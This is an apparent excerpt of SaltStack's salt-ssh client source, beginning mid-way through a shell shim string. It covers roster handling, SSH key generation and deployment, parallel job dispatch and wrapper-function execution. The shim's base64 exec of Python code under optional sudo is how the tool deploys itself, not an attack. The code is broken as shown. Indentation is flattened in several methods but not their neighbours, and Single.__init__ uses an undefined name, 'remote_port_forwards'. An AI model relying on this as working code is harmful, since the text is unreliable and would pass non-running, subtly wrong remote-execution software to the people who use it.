py_cmd_path=`"$py_cmd" -c 'from __future__ import print_function;import sys; print(sys.executable);'`
cmdpath=`command -v $py_cmd 2>/dev/null || which $py_cmd 2>/dev/null`
if file $cmdpath | grep "shell script" > /dev/null
then
ex_vars="'PATH', 'LD_LIBRARY_PATH', 'MANPATH', \
'XDG_DATA_DIRS', 'PKG_CONFIG_PATH'"
export `$py_cmd -c \
"from __future__ import print_function;
import sys;
import os;
map(sys.stdout.write, ['{{{{0}}}}={{{{1}}}} ' \
.format(x, os.environ[x]) for x in [$ex_vars]])"`
exec $SUDO PATH=$PATH LD_LIBRARY_PATH=$LD_LIBRARY_PATH \
MANPATH=$MANPATH XDG_DATA_DIRS=$XDG_DATA_DIRS \
PKG_CONFIG_PATH=$PKG_CONFIG_PATH \
"$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
else
exec $SUDO "$py_cmd_path" -c \
'import base64;
exec(base64.b64decode("""{{SSH_PY_CODE}}""").decode("utf-8"))'
fi
exit 0
else
continue
fi
done
echo "ERROR: Unable to locate appropriate python command" >&2
exit $EX_PYTHON_INVALID
EOF'''.format(
            EX_THIN_PYTHON_INVALID=salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,
        ).split(
            "\n"
        )
    ]
)
# Load the python-side shim source at import time (POSIX targets only; the
# Windows path is handled by saltwinshell when available).
if not is_windows():
    shim_file = os.path.join(os.path.dirname(__file__), "ssh_py_shim.py")
    if not os.path.exists(shim_file):
        # On esky builds we only have the .pyc file
        shim_file += "c"
    with salt.utils.files.fopen(shim_file) as ssh_py_shim:
        SSH_PY_SHIM = ssh_py_shim.read()
log = logging.getLogger(__name__)
class SSH(object):
"""
Create an SSH execution system
"""
ROSTER_UPDATE_FLAG = "#__needs_update"
def __init__(self, opts):
    """Build the salt-ssh execution system from master ``opts``: resolve
    targets from the roster, pick the SSH private key, assemble per-target
    connection defaults, and generate the salt-thin tarball."""
    # Sentinel entry marks that the flat roster may still need updating:
    self.__parsed_rosters = {SSH.ROSTER_UPDATE_FLAG: True}
    pull_sock = os.path.join(opts["sock_dir"], "master_event_pull.ipc")
    # Only fire events if the master event socket exists and zmq imported:
    if os.path.exists(pull_sock) and zmq:
        self.event = salt.utils.event.get_event(
            "master", opts["sock_dir"], opts["transport"], opts=opts, listen=False
        )
    else:
        self.event = None
    self.opts = opts
    # Regenerating thin implies wiping the deployed copy on the targets:
    if self.opts["regen_thin"]:
        self.opts["ssh_wipe"] = True
    if not salt.utils.path.which("ssh"):
        raise salt.exceptions.SaltSystemExit(
            code=-1,
            msg="No ssh binary found in path -- ssh must be installed for salt-ssh to run. Exiting.",
        )
    self.opts["_ssh_version"] = ssh_version()
    self.tgt_type = (
        self.opts["selected_target_option"]
        if self.opts["selected_target_option"]
        else "glob"
    )
    # Reverse-resolve a bare IP target to a roster hostname, if possible:
    self._expand_target()
    self.roster = salt.roster.Roster(self.opts, self.opts.get("roster", "flat"))
    self.targets = self.roster.targets(self.opts["tgt"], self.tgt_type)
    if not self.targets:
        self._update_targets()
    # If we're in a wfunc, we need to get the ssh key location from the
    # top level opts, stored in __master_opts__
    if "__master_opts__" in self.opts:
        if self.opts["__master_opts__"].get("ssh_use_home_key") and os.path.isfile(
            os.path.expanduser("~/.ssh/id_rsa")
        ):
            priv = os.path.expanduser("~/.ssh/id_rsa")
        else:
            priv = self.opts["__master_opts__"].get(
                "ssh_priv",
                os.path.join(
                    self.opts["__master_opts__"]["pki_dir"], "ssh", "salt-ssh.rsa"
                ),
            )
    else:
        priv = self.opts.get(
            "ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
        )
    # Generate the salt-ssh keypair on first use ("agent-forwarding" means
    # no key file is managed by salt at all):
    if priv != "agent-forwarding":
        if not os.path.isfile(priv):
            try:
                salt.client.ssh.shell.gen_key(priv)
            except OSError:
                raise salt.exceptions.SaltClientError(
                    "salt-ssh could not be run because it could not generate keys.\n\n"
                    "You can probably resolve this by executing this script with "
                    "increased permissions via sudo or by running as root.\n"
                    "You could also use the '-c' option to supply a configuration "
                    "directory that you have permissions to read and write to."
                )
    # Per-target connection defaults; any roster entry can override these.
    self.defaults = {
        "user": self.opts.get(
            "ssh_user", salt.config.DEFAULT_MASTER_OPTS["ssh_user"]
        ),
        "port": self.opts.get(
            "ssh_port", salt.config.DEFAULT_MASTER_OPTS["ssh_port"]
        ),
        "passwd": self.opts.get(
            "ssh_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_passwd"]
        ),
        "priv": priv,
        "priv_passwd": self.opts.get(
            "ssh_priv_passwd", salt.config.DEFAULT_MASTER_OPTS["ssh_priv_passwd"]
        ),
        # Overall timeout is the SSH connect timeout plus the job timeout:
        "timeout": self.opts.get(
            "ssh_timeout", salt.config.DEFAULT_MASTER_OPTS["ssh_timeout"]
        )
        + self.opts.get("timeout", salt.config.DEFAULT_MASTER_OPTS["timeout"]),
        "sudo": self.opts.get(
            "ssh_sudo", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo"]
        ),
        "sudo_user": self.opts.get(
            "ssh_sudo_user", salt.config.DEFAULT_MASTER_OPTS["ssh_sudo_user"]
        ),
        "identities_only": self.opts.get(
            "ssh_identities_only",
            salt.config.DEFAULT_MASTER_OPTS["ssh_identities_only"],
        ),
        "remote_port_forwards": self.opts.get("ssh_remote_port_forwards"),
        "ssh_options": self.opts.get("ssh_options"),
    }
    # Randomized thin dir implies single-use deployment; wipe it afterwards.
    if self.opts.get("rand_thin_dir"):
        self.defaults["thin_dir"] = os.path.join(
            "/var/tmp", ".{0}".format(uuid.uuid4().hex[:6])
        )
        self.opts["ssh_wipe"] = "True"
    # NOTE(review): salt.payload and salt.fileclient are not in the visible
    # import block — presumably imported transitively by another salt
    # module; verify against the full file.
    self.serial = salt.payload.Serial(opts)
    self.returners = salt.loader.returners(self.opts, {})
    self.fsclient = salt.fileclient.FSClient(self.opts)
    self.thin = salt.utils.thin.gen_thin(
        self.opts["cachedir"],
        extra_mods=self.opts.get("thin_extra_mods"),
        overwrite=self.opts["regen_thin"],
        python2_bin=self.opts["python2_bin"],
        python3_bin=self.opts["python3_bin"],
        extended_cfg=self.opts.get("ssh_ext_alternatives"),
    )
    self.mods = mod_data(self.fsclient)
def _get_roster(self):
"""
Read roster filename as a key to the data.
:return:
"""
roster_file = salt.roster.get_roster_file(self.opts)
if roster_file not in self.__parsed_rosters:
roster_data = compile_template(
roster_file,
salt.loader.render(self.opts, {}),
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
self.__parsed_rosters[roster_file] = roster_data
return roster_file
    def _expand_target(self):
        """
        Figures out if the target is a reachable host without wildcards, expands if any.

        When the target is a single, reachable, literal IP address, it is
        reverse-resolved to a hostname; if that hostname appears in a parsed
        roster, ``self.opts["tgt"]`` is rewritten to the hostname and the
        roster-update flag is cleared so the host is not appended again.

        :return: None
        """
        # TODO: Support -L
        target = self.opts["tgt"]
        if isinstance(target, list):
            return
        # Strip an optional "user@" prefix; only the host part is expanded.
        hostname = self.opts["tgt"].split("@")[-1]
        # Expansion applies only to a plain reachable IP (no wildcards).
        needs_expansion = (
            "*" not in hostname
            and salt.utils.network.is_reachable_host(hostname)
            and salt.utils.network.is_ip(hostname)
        )
        if needs_expansion:
            hostname = salt.utils.network.ip_to_host(hostname)
            if hostname is None:
                # Reverse lookup failed
                return
            self._get_roster()
            for roster_filename in self.__parsed_rosters:
                roster_data = self.__parsed_rosters[roster_filename]
                # The ROSTER_UPDATE_FLAG slot holds a bool, not roster data.
                if not isinstance(roster_data, bool):
                    for host_id in roster_data:
                        if hostname in [host_id, roster_data.get("host")]:
                            if hostname != self.opts["tgt"]:
                                self.opts["tgt"] = hostname
                            # Host is already known: suppress roster append.
                            self.__parsed_rosters[self.ROSTER_UPDATE_FLAG] = False
                            return
def _update_roster(self):
"""
Update default flat roster with the passed in information.
:return:
"""
roster_file = self._get_roster()
if os.access(roster_file, os.W_OK):
if self.__parsed_rosters[self.ROSTER_UPDATE_FLAG]:
with salt.utils.files.fopen(roster_file, "a") as roster_fp:
roster_fp.write(
'# Automatically added by "{s_user}" at {s_time}\n{hostname}:\n host: '
"{hostname}\n user: {user}"
"\n passwd: {passwd}\n".format(
s_user=getpass.getuser(),
s_time=datetime.datetime.utcnow().isoformat(),
hostname=self.opts.get("tgt", ""),
user=self.opts.get("ssh_user", ""),
passwd=self.opts.get("ssh_passwd", ""),
)
)
log.info(
"The host {0} has been added to the roster {1}".format(
self.opts.get("tgt", ""), roster_file
)
)
else:
log.error("Unable to update roster {0}: access denied".format(roster_file))
def _update_targets(self):
"""
Uptade targets in case hostname was directly passed without the roster.
:return:
"""
hostname = self.opts.get("tgt", "")
if "@" in hostname:
user, hostname = hostname.split("@", 1)
else:
user = self.opts.get("ssh_user")
if hostname == "*":
hostname = ""
if salt.utils.network.is_reachable_host(hostname):
hostname = salt.utils.network.ip_to_host(hostname)
self.opts["tgt"] = hostname
self.targets[hostname] = {
"passwd": self.opts.get("ssh_passwd", ""),
"host": hostname,
"user": user,
}
if self.opts.get("ssh_update_roster"):
self._update_roster()
def get_pubkey(self):
"""
Return the key string for the SSH public key
"""
if (
"__master_opts__" in self.opts
and self.opts["__master_opts__"].get("ssh_use_home_key")
and os.path.isfile(os.path.expanduser("~/.ssh/id_rsa"))
):
priv = os.path.expanduser("~/.ssh/id_rsa")
else:
priv = self.opts.get(
"ssh_priv", os.path.join(self.opts["pki_dir"], "ssh", "salt-ssh.rsa")
)
pub = "{0}.pub".format(priv)
with salt.utils.files.fopen(pub, "r") as fp_:
return "{0} rsa root@master".format(fp_.read().split()[1])
def key_deploy(self, host, ret):
"""
Deploy the SSH key if the minions don't auth
"""
if not isinstance(ret[host], dict) or self.opts.get("ssh_key_deploy"):
target = self.targets[host]
if target.get("passwd", False) or self.opts["ssh_passwd"]:
self._key_deploy_run(host, target, False)
return ret
if ret[host].get("stderr", "").count("Permission denied"):
target = self.targets[host]
# permission denied, attempt to auto deploy ssh key
print(
(
"Permission denied for host {0}, do you want to deploy "
"the salt-ssh key? (password required):"
).format(host)
)
deploy = input("[Y/n] ")
if deploy.startswith(("n", "N")):
return ret
target["passwd"] = getpass.getpass(
"Password for {0}@{1}: ".format(target["user"], host)
)
return self._key_deploy_run(host, target, True)
return ret
    def _key_deploy_run(self, host, target, re_run=True):
        """
        The ssh-copy-id routine

        Pushes the master's public key to *host* (via ``ssh-copy-id`` when
        available, otherwise through a Single run of ``ssh.set_auth_key``)
        and, when *re_run* is set, re-executes the original command on the
        now-authorized target and returns its parsed result.
        """
        argv = [
            "ssh.set_auth_key",
            target.get("user", "root"),
            self.get_pubkey(),
        ]
        single = Single(
            self.opts,
            argv,
            host,
            mods=self.mods,
            fsclient=self.fsclient,
            thin=self.thin,
            **target
        )
        if salt.utils.path.which("ssh-copy-id"):
            # we have ssh-copy-id, use it!
            stdout, stderr, retcode = single.shell.copy_id()
        else:
            stdout, stderr, retcode = single.run()
        if re_run:
            # The key is (hopefully) in place; drop the password and run the
            # original command over the freshly authorized connection.
            target.pop("passwd")
            single = Single(
                self.opts,
                self.opts["argv"],
                host,
                mods=self.mods,
                fsclient=self.fsclient,
                thin=self.thin,
                **target
            )
            stdout, stderr, retcode = single.cmd_block()
            try:
                data = salt.utils.json.find_json(stdout)
                return {host: data.get("local", data)}
            except Exception:  # pylint: disable=broad-except
                if stderr:
                    return {host: stderr}
                return {host: "Bad Return"}
        # Only reached when re_run is False: report the deploy result itself.
        if salt.defaults.exitcodes.EX_OK != retcode:
            return {host: stderr}
        return {host: stdout}
def handle_routine(self, que, opts, host, target, mine=False):
"""
Run the routine in a "Thread", put a dict on the queue
"""
opts = copy.deepcopy(opts)
single = Single(
opts,
opts["argv"],
host,
mods=self.mods,
fsclient=self.fsclient,
thin=self.thin,
mine=mine,
**target
)
ret = {"id": single.id}
stdout, stderr, retcode = single.run()
# This job is done, yield
try:
data = salt.utils.json.find_json(stdout)
if len(data) < 2 and "local" in data:
ret["ret"] = data["local"]
else:
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
except Exception: # pylint: disable=broad-except
ret["ret"] = {
"stdout": stdout,
"stderr": stderr,
"retcode": retcode,
}
que.put(ret)
    def handle_ssh(self, mine=False):
        """
        Spin up the needed threads or processes and execute the subsequent
        routines

        Generator: yields one ``{host: return_data}`` dict per target as
        results arrive from the worker processes via a multiprocessing queue.
        """
        que = multiprocessing.Queue()
        running = {}
        target_iter = self.targets.__iter__()
        returned = set()
        rets = set()
        # init flips to True once every target has been dispatched.
        init = False
        while True:
            if not self.targets:
                log.error("No matching targets found in roster.")
                break
            # Dispatch phase: start workers until the pool is full or the
            # target iterator is exhausted.
            if len(running) < self.opts.get("ssh_max_procs", 25) and not init:
                try:
                    host = next(target_iter)
                except StopIteration:
                    init = True
                    continue
                # Fill per-target settings missing from the roster entry.
                for default in self.defaults:
                    if default not in self.targets[host]:
                        self.targets[host][default] = self.defaults[default]
                if "host" not in self.targets[host]:
                    self.targets[host]["host"] = host
                if self.targets[host].get("winrm") and not HAS_WINSHELL:
                    # Windows targets require the proprietary saltwinshell
                    # module; report the failure instead of dispatching.
                    returned.add(host)
                    rets.add(host)
                    log_msg = "Please contact sales@saltstack.com for access to the enterprise saltwinshell module."
                    log.debug(log_msg)
                    no_ret = {
                        "fun_args": [],
                        "jid": None,
                        "return": log_msg,
                        "retcode": 1,
                        "fun": "",
                        "id": host,
                    }
                    yield {host: no_ret}
                    continue
                args = (
                    que,
                    self.opts,
                    host,
                    self.targets[host],
                    mine,
                )
                routine = Process(target=self.handle_routine, args=args)
                routine.start()
                running[host] = {"thread": routine}
                continue
            # Collection phase: drain at most one result from the queue.
            ret = {}
            try:
                ret = que.get(False)
                if "id" in ret:
                    returned.add(ret["id"])
                    yield {ret["id"]: ret["ret"]}
            except Exception:  # pylint: disable=broad-except
                # This bare exception is here to catch spurious exceptions
                # thrown by que.get during healthy operation. Please do not
                # worry about this bare exception, it is entirely here to
                # control program flow.
                pass
            # Reap finished workers, draining any returns that raced in.
            for host in running:
                if not running[host]["thread"].is_alive():
                    if host not in returned:
                        # Try to get any returns that came through since we
                        # last checked
                        try:
                            while True:
                                ret = que.get(False)
                                if "id" in ret:
                                    returned.add(ret["id"])
                                    yield {ret["id"]: ret["ret"]}
                        except Exception:  # pylint: disable=broad-except
                            pass
                        if host not in returned:
                            # Worker exited without posting any result.
                            error = (
                                "Target '{0}' did not return any data, "
                                "probably due to an error."
                            ).format(host)
                            ret = {"id": host, "ret": error}
                            log.error(error)
                            yield {ret["id"]: ret["ret"]}
                    running[host]["thread"].join()
                    rets.add(host)
            for host in rets:
                if host in running:
                    running.pop(host)
            # All targets accounted for: stop.
            if len(rets) >= len(self.targets):
                break
            # Sleep when limit or all threads started
            if len(running) >= self.opts.get("ssh_max_procs", 25) or len(
                self.targets
            ) >= len(running):
                time.sleep(0.1)
    def run_iter(self, mine=False, jid=None):
        """
        Execute and yield returns as they come in, do not print to the display

        mine
            The Single objects will use mine_functions defined in the roster,
            pillar, or master config (they will be checked in that order) and
            will modify the argv with the arguments from mine_functions
        """
        # Reserve a jid through the configured master job cache returner.
        fstr = "{0}.prep_jid".format(self.opts["master_job_cache"])
        jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
        # Save the invocation information
        argv = self.opts["argv"]
        if self.opts.get("raw_shell", False):
            fun = "ssh._raw"
            args = argv
        else:
            fun = argv[0] if argv else ""
            args = argv[1:]
        job_load = {
            "jid": jid,
            "tgt_type": self.tgt_type,
            "tgt": self.opts["tgt"],
            "user": self.opts["user"],
            "fun": fun,
            "arg": args,
        }
        # save load to the master job cache
        if self.opts["master_job_cache"] == "local_cache":
            # local_cache additionally records the minion list for the job.
            self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
                jid, job_load, minions=self.targets.keys()
            )
        else:
            self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
                jid, job_load
            )
        for ret in self.handle_ssh(mine=mine):
            host = next(six.iterkeys(ret))
            self.cache_job(jid, host, ret[host], fun)
            if self.event:
                # Fire a per-host return event on the master event bus.
                id_, data = next(six.iteritems(ret))
                if isinstance(data, six.text_type):
                    data = {"return": data}
                if "id" not in data:
                    data["id"] = id_
                data[
                    "jid"
                ] = jid  # make the jid in the payload the same as the jid in the tag
                self.event.fire_event(
                    data, salt.utils.event.tagify([jid, "ret", host], "job")
                )
            yield ret
def cache_job(self, jid, id_, ret, fun):
"""
Cache the job information
"""
self.returners["{0}.returner".format(self.opts["master_job_cache"])](
{"jid": jid, "id": id_, "return": ret, "fun": fun}
)
    def run(self, jid=None):
        """
        Execute the overall routine, print results via outputters

        Handles the ``list_hosts`` short-circuit, records the job in the
        master job cache, prints/fires each host's result as it arrives, and
        exits with an aggregate error code when any host failed.
        """
        if self.opts.get("list_hosts"):
            # Only display the parsed roster contents, then exit.
            self._get_roster()
            ret = {}
            for roster_file in self.__parsed_rosters:
                # Keys starting with "#" are internal bookkeeping entries
                # (presumably the roster-update flag), not roster files.
                if roster_file.startswith("#"):
                    continue
                ret[roster_file] = {}
                for host_id in self.__parsed_rosters[roster_file]:
                    hostname = self.__parsed_rosters[roster_file][host_id]["host"]
                    ret[roster_file][host_id] = hostname
            salt.output.display_output(ret, "nested", self.opts)
            sys.exit()
        # Reserve a jid through the configured master job cache returner.
        fstr = "{0}.prep_jid".format(self.opts["master_job_cache"])
        jid = self.returners[fstr](passed_jid=jid or self.opts.get("jid", None))
        # Save the invocation information
        argv = self.opts["argv"]
        if self.opts.get("raw_shell", False):
            fun = "ssh._raw"
            args = argv
        else:
            fun = argv[0] if argv else ""
            args = argv[1:]
        job_load = {
            "jid": jid,
            "tgt_type": self.tgt_type,
            "tgt": self.opts["tgt"],
            "user": self.opts["user"],
            "fun": fun,
            "arg": args,
        }
        # save load to the master job cache
        try:
            if isinstance(jid, bytes):
                jid = jid.decode("utf-8")
            if self.opts["master_job_cache"] == "local_cache":
                # local_cache additionally records the minion list.
                self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
                    jid, job_load, minions=self.targets.keys()
                )
            else:
                self.returners["{0}.save_load".format(self.opts["master_job_cache"])](
                    jid, job_load
                )
        except Exception as exc:  # pylint: disable=broad-except
            # A broken job cache should not abort the run itself.
            log.exception(exc)
            log.error(
                "Could not save load with returner %s: %s",
                self.opts["master_job_cache"],
                exc,
            )
        if self.opts.get("verbose"):
            msg = "Executing job with jid {0}".format(jid)
            print(msg)
            print("-" * len(msg) + "\n")
            print("")
        sret = {}
        outputter = self.opts.get("output", "nested")
        final_exit = 0
        for ret in self.handle_ssh():
            host = next(six.iterkeys(ret))
            # A non-dict return or a nonzero retcode marks the whole run
            # as failed for the aggregate exit code.
            if isinstance(ret[host], dict):
                host_ret = ret[host].get("retcode", 0)
                if host_ret != 0:
                    final_exit = 1
            else:
                # Error on host
                final_exit = 1
            self.cache_job(jid, host, ret[host], fun)
            ret = self.key_deploy(host, ret)
            # Collapse plain ssh transport errors down to their stderr text.
            if isinstance(ret[host], dict) and (
                ret[host].get("stderr") or ""
            ).startswith("ssh:"):
                ret[host] = ret[host]["stderr"]
            if not isinstance(ret[host], dict):
                p_data = {host: ret[host]}
            elif "return" not in ret[host]:
                p_data = ret
            else:
                # Let the module-provided outputter override the default.
                outputter = ret[host].get("out", self.opts.get("output", "nested"))
                p_data = {host: ret[host].get("return", {})}
            if self.opts.get("static"):
                # Static output: accumulate and print everything at the end.
                sret.update(p_data)
            else:
                salt.output.display_output(p_data, outputter, self.opts)
            if self.event:
                # Fire a per-host return event on the master event bus.
                id_, data = next(six.iteritems(ret))
                if isinstance(data, six.text_type):
                    data = {"return": data}
                if "id" not in data:
                    data["id"] = id_
                data[
                    "jid"
                ] = jid  # make the jid in the payload the same as the jid in the tag
                self.event.fire_event(
                    data, salt.utils.event.tagify([jid, "ret", host], "job")
                )
        if self.opts.get("static"):
            salt.output.display_output(sret, outputter, self.opts)
        if final_exit:
            sys.exit(salt.defaults.exitcodes.EX_AGGREGATE)
class Single(object):
"""
Hold onto a single ssh execution
"""
# 1. Get command ready
# 2. Check if target has salt
# 3. deploy salt-thin
# 4. execute requested command via salt-thin
    def __init__(
        self,
        opts,
        argv,
        id_,
        host,
        user=None,
        port=None,
        passwd=None,
        priv=None,
        priv_passwd=None,
        timeout=30,
        sudo=False,
        tty=False,
        mods=None,
        fsclient=None,
        thin=None,
        mine=False,
        minion_opts=None,
        identities_only=False,
        sudo_user=None,
        winrm=False,
        ssh_options=None,
        **kwargs
    ):
        """
        Set up a single salt-ssh execution against *host*.

        ``opts`` is the (master) options dict, ``argv`` the command to run
        (string or list), ``id_`` the minion id from the roster, and the
        remaining keyword arguments are per-target connection settings;
        any extra roster keys arrive through ``**kwargs``.
        """
        # Get mine setting and mine_functions if defined in kwargs (from roster)
        self.mine = mine
        self.mine_functions = kwargs.get("mine_functions")
        self.cmd_umask = kwargs.get("cmd_umask", None)
        self.winrm = winrm
        self.opts = opts
        self.tty = tty
        if kwargs.get("disable_wipe"):
            self.wipe = False
        else:
            self.wipe = bool(self.opts.get("ssh_wipe"))
        # Pick the remote thin dir: roster override, winrm machinery, or a
        # per-user path salted with a short FQDN-derived uuid fragment.
        if kwargs.get("thin_dir"):
            self.thin_dir = kwargs["thin_dir"]
        elif self.winrm:
            # NOTE(review): set_winvars presumably assigns self.thin_dir for
            # winrm targets -- confirm in saltwinshell.
            saltwinshell.set_winvars(self)
            self.python_env = kwargs.get("ssh_python_env")
        else:
            if user:
                thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", user)
            else:
                thin_dir = DEFAULT_THIN_DIR.replace("%%USER%%", "root")
            self.thin_dir = thin_dir.replace(
                "%%FQDNUUID%%",
                uuid.uuid3(uuid.NAMESPACE_DNS, salt.utils.network.get_fqhostname()).hex[
                    :6
                ],
            )
        self.opts["thin_dir"] = self.thin_dir
        self.fsclient = fsclient
        self.context = {"master_opts": self.opts, "fileclient": self.fsclient}
        self.ssh_pre_flight = kwargs.get("ssh_pre_flight", None)
        if self.ssh_pre_flight:
            self.ssh_pre_file = os.path.basename(self.ssh_pre_flight)
        # Normalize argv to a list; a bare string is a single command.
        if isinstance(argv, six.string_types):
            self.argv = [argv]
        else:
            self.argv = argv
        self.fun, self.args, self.kwargs = self.__arg_comps()
        self.id = id_
        self.set_path = kwargs.get("set_path", "")
        self.mods = mods if isinstance(mods, dict) else {}
        # Connection settings handed to the shell and merged into the target.
        args = {
            "host": host,
            "user": user,
            "port": port,
            "passwd": passwd,
            "priv": priv,
            "priv_passwd": priv_passwd,
            "timeout": timeout,
            "sudo": sudo,
            "tty": tty,
            "mods": self.mods,
            "identities_only": identities_only,
            "sudo_user": sudo_user,
            "remote_port_forwards": remote_port_forwards,
            "winrm": winrm,
            "ssh_options": ssh_options,
        }
        # Pre apply changeable defaults
        self.minion_opts = {
            "grains_cache": True,
            "log_file": "salt-call.log",
        }
        self.minion_opts.update(opts.get("ssh_minion_opts", {}))
        if minion_opts is not None:
            self.minion_opts.update(minion_opts)
        # Post apply system needed defaults
        self.minion_opts.update(
            {
                "root_dir": os.path.join(self.thin_dir, "running_data"),
                "id": self.id,
                "sock_dir": "/",
                "fileserver_list_cache_time": 3,
            }
        )
        self.minion_config = salt.serializers.yaml.serialize(self.minion_opts)
        self.target = kwargs
        self.target.update(args)
        self.serial = salt.payload.Serial(opts)
        self.wfuncs = salt.loader.ssh_wrapper(opts, None, self.context)
        self.shell = salt.client.ssh.shell.gen_shell(opts, **args)
        if self.winrm:
            # Determine if Windows client is x86 or AMD64
            arch, _, _ = self.shell.exec_cmd("powershell $ENV:PROCESSOR_ARCHITECTURE")
            self.arch = arch.strip()
        self.thin = thin if thin else salt.utils.thin.thin_path(opts["cachedir"])
def __arg_comps(self):
"""
Return the function name and the arg list
"""
fun = self.argv[0] if self.argv else ""
parsed = salt.utils.args.parse_input(
self.argv[1:], condition=False, no_parse=self.opts.get("no_parse", [])
)
args = parsed[0]
kws = parsed[1]
return fun, args, kws
def _escape_arg(self, arg):
"""
Properly escape argument to protect special characters from shell
interpretation. This avoids having to do tricky argument quoting.
Effectively just escape all characters in the argument that are not
alphanumeric!
"""
if self.winrm:
return arg
return "".join(["\\" + char if re.match(r"\W", char) else char for char in arg])
def run_ssh_pre_flight(self):
"""
Run our pre_flight script before running any ssh commands
"""
script = os.path.join(tempfile.gettempdir(), self.ssh_pre_file)
self.shell.send(self.ssh_pre_flight, script)
return self.execute_script(script)
def check_thin_dir(self):
"""
check if the thindir exists on the remote machine
"""
stdout, stderr, retcode = self.shell.exec_cmd(
"test -d {0}".format(self.thin_dir)
)
if retcode != 0:
return False
return True
def deploy(self):
"""
Deploy salt-thin
"""
self.shell.send(
self.thin, os.path.join(self.thin_dir, "salt-thin.tgz"),
)
self.deploy_ext()
return True
def deploy_ext(self):
"""
Deploy the ext_mods tarball
"""
if self.mods.get("file"):
self.shell.send(
self.mods["file"], os.path.join(self.thin_dir, "salt-ext_mods.tgz"),
)
return True
    def run(self, deploy_attempted=False):
        """
        Execute the routine, the routine can be either:
        1. Execute a raw shell command
        2. Execute a wrapper func
        3. Execute a remote Salt command
        If a (re)deploy is needed, then retry the operation after a deploy
        attempt
        Returns tuple of (stdout, stderr, retcode)
        """
        # NOTE(review): deploy_attempted is not referenced in this body --
        # possibly kept for interface compatibility; confirm before removal.
        stdout = stderr = retcode = None
        if self.ssh_pre_flight:
            # Run the pre-flight script unless the thin dir already exists
            # (and re-running was not forced via ssh_run_pre_flight).
            if not self.opts.get("ssh_run_pre_flight", False) and self.check_thin_dir():
                log.info(
                    "{0} thin dir already exists. Not running ssh_pre_flight script".format(
                        self.thin_dir
                    )
                )
            elif not os.path.exists(self.ssh_pre_flight):
                log.error(
                    "The ssh_pre_flight script {0} does not exist".format(
                        self.ssh_pre_flight
                    )
                )
            else:
                stdout, stderr, retcode = self.run_ssh_pre_flight()
                if stderr:
                    # Any stderr output aborts the whole run.
                    log.error(
                        "Error running ssh_pre_flight script {0}".format(
                            self.ssh_pre_file
                        )
                    )
                    return stdout, stderr, retcode
                log.info(
                    "Successfully ran the ssh_pre_flight script: {0}".format(
                        self.ssh_pre_file
                    )
                )
        if self.opts.get("raw_shell", False):
            # 1. Raw shell command, escaped for the remote shell.
            cmd_str = " ".join([self._escape_arg(arg) for arg in self.argv])
            stdout, stderr, retcode = self.shell.exec_cmd(cmd_str)
        elif self.fun in self.wfuncs or self.mine:
            # 2. Wrapper function runs locally; note stderr stays None here.
            stdout, retcode = self.run_wfunc()
        else:
            # 3. Remote Salt command through the shim.
            stdout, stderr, retcode = self.cmd_block()
        return stdout, stderr, retcode
    def run_wfunc(self):
        """
        Execute a wrapper function

        Returns tuple of (json_data, retcode); json_data mimics the
        "salt-call --local" structure with a top-level "local" key.
        """
        # Ensure that opts/grains are up to date
        # Execute routine
        # data_cache is hard-wired off here; the refresh branch below is
        # therefore always taken (it forces refresh when data_cache is falsy).
        data_cache = False
        data = None
        cdir = os.path.join(self.opts["cachedir"], "minions", self.id)
        if not os.path.isdir(cdir):
            os.makedirs(cdir)
        datap = os.path.join(cdir, "ssh_data.p")
        refresh = False
        if not os.path.isfile(datap):
            refresh = True
        else:
            # Cached data expires after cache_life minutes.
            passed_time = (time.time() - os.stat(datap).st_mtime) / 60
            if passed_time > self.opts.get("cache_life", 60):
                refresh = True
        if self.opts.get("refresh_cache"):
            refresh = True
        conf_grains = {}
        # Save conf file grains before they get clobbered
        if "ssh_grains" in self.opts:
            conf_grains = self.opts["ssh_grains"]
        if not data_cache:
            refresh = True
        if refresh:
            # Make the datap
            # TODO: Auto expire the datap
            # Query the target once to obtain its opts/grains package.
            pre_wrapper = salt.client.ssh.wrapper.FunctionWrapper(
                self.opts,
                self.id,
                fsclient=self.fsclient,
                minion_opts=self.minion_opts,
                **self.target
            )
            opts_pkg = pre_wrapper["test.opts_pkg"]()  # pylint: disable=E1102
            if "_error" in opts_pkg:
                # Refresh failed
                retcode = opts_pkg["retcode"]
                ret = salt.utils.json.dumps({"local": opts_pkg})
                return ret, retcode
            # Overlay master-side settings onto the target's opts package.
            opts_pkg["file_roots"] = self.opts["file_roots"]
            opts_pkg["pillar_roots"] = self.opts["pillar_roots"]
            opts_pkg["ext_pillar"] = self.opts["ext_pillar"]
            opts_pkg["extension_modules"] = self.opts["extension_modules"]
            opts_pkg["module_dirs"] = self.opts["module_dirs"]
            opts_pkg["_ssh_version"] = self.opts["_ssh_version"]
            opts_pkg["__master_opts__"] = self.context["master_opts"]
            if "known_hosts_file" in self.opts:
                opts_pkg["known_hosts_file"] = self.opts["known_hosts_file"]
            if "_caller_cachedir" in self.opts:
                opts_pkg["_caller_cachedir"] = self.opts["_caller_cachedir"]
            else:
                opts_pkg["_caller_cachedir"] = self.opts["cachedir"]
            # Use the ID defined in the roster file
            opts_pkg["id"] = self.id
            # Success default; only reassigned by the except blocks below.
            retcode = 0
            # Restore master grains
            for grain in conf_grains:
                opts_pkg["grains"][grain] = conf_grains[grain]
            # Enable roster grains support
            if "grains" in self.target:
                for grain in self.target["grains"]:
                    opts_pkg["grains"][grain] = self.target["grains"][grain]
            popts = {}
            popts.update(opts_pkg["__master_opts__"])
            popts.update(opts_pkg)
            # Compile pillar for this minion with the merged options.
            pillar = salt.pillar.Pillar(
                popts,
                opts_pkg["grains"],
                opts_pkg["id"],
                opts_pkg.get("saltenv", "base"),
            )
            pillar_data = pillar.compile_pillar()
            # TODO: cache minion opts in datap in master.py
            data = {
                "opts": opts_pkg,
                "grains": opts_pkg["grains"],
                "pillar": pillar_data,
            }
